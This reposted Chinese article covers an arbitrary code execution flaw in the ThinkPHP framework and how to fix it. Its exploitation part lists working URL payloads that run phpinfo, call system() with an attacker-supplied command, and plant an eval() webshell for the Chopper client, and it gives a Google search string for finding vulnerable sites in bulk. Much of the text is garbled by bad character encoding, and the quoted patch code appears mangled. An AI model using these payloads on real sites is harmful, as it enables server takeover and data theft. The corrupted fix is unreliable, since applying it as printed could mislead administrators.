Thinkphp是國(guó)內(nèi)著名的開源的php框架，是為了簡(jiǎn)化企業(yè)級(jí)應(yīng)用開發(fā)和敏捷WEB應(yīng)用開發(fā)而誕生的。最早誕生于2006年初，原名FCS，2007年元旦正式更名為Thinkphp，并且遵循Apache2開源協(xié)議發(fā)布。早期的思想架構(gòu)來源于Struts，后來經(jīng)過不斷改進(jìn)和完善，同時(shí)也借鑒了國(guó)外很多優(yōu)秀的框架和模式，使用面向?qū)ο蟮拈_發(fā)結(jié) 構(gòu)和MVC模式，融合了Struts的Action和Dao思想和JSP的TagLib（標(biāo)簽庫(kù)）、RoR的ORM映射和ActiveRecord模式， 封裝了CURD和一些常用操作，單一入口模式等，在模版引擎、緩存機(jī)制、認(rèn)證機(jī)制和擴(kuò)展性方面均有獨(dú)特的表現(xiàn).
 
然而近期thinkphp框架爆出了一個(gè)任意代碼執(zhí)行漏洞，其危害性相當(dāng)?shù)母?漏洞利用方法如下：
 

index.php/module/aciton/param1/${@print(THINK_VERSION)} index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函數(shù)，比如:

index.php/module/aciton/param1/${@phpinfo()}

就可以獲取服務(wù)器的系統(tǒng)配置信息等。

index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al

可以列出網(wǎng)站文件列表

index.php/module/action/param1/{${eval($_POST[s])}}

就可以直接執(zhí)行一句話代碼，用菜刀直接連接.

這樣黑客們就可以直接通過google批量搜索關(guān)鍵字：thinkphp intitle:系統(tǒng)發(fā)生錯(cuò)誤 來獲取更多使用thinkphp框架的網(wǎng)站列表。可見其危害性相當(dāng)?shù)拇蟆?br /> 
thinkphp框架執(zhí)行任意代碼漏洞修復(fù)方法：
 
用戶可下載官方發(fā)布的補(bǔ)?。?br /> 
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
 
或者或者直接修改源碼：

將/Thinkphp/Lib/Core/Dispatcher.class.php文件中的

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2";', implode($depr,$paths));

修改為：

$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'//]+)@e', '$var[/'//1/']="http://2';', implode($depr,$paths));

將preg_replace第二個(gè)參數(shù)中的雙引號(hào)改為單引號(hào)，防止其中的php變量語法被解析執(zhí)行。
 
注：本文僅供學(xué)習(xí)參考使用，請(qǐng)不要用于非法用途。

php技術(shù)：ThinkPHP框架任意代碼執(zhí)行漏洞的利用及其修復(fù)方法，轉(zhuǎn)載需保留來源！

鄭重聲明：本文版權(quán)歸原作者所有，轉(zhuǎn)載文章僅為傳播更多信息之目的，如作者信息標(biāo)記有誤，請(qǐng)第一時(shí)間聯(lián)系我們修改或刪除，多謝。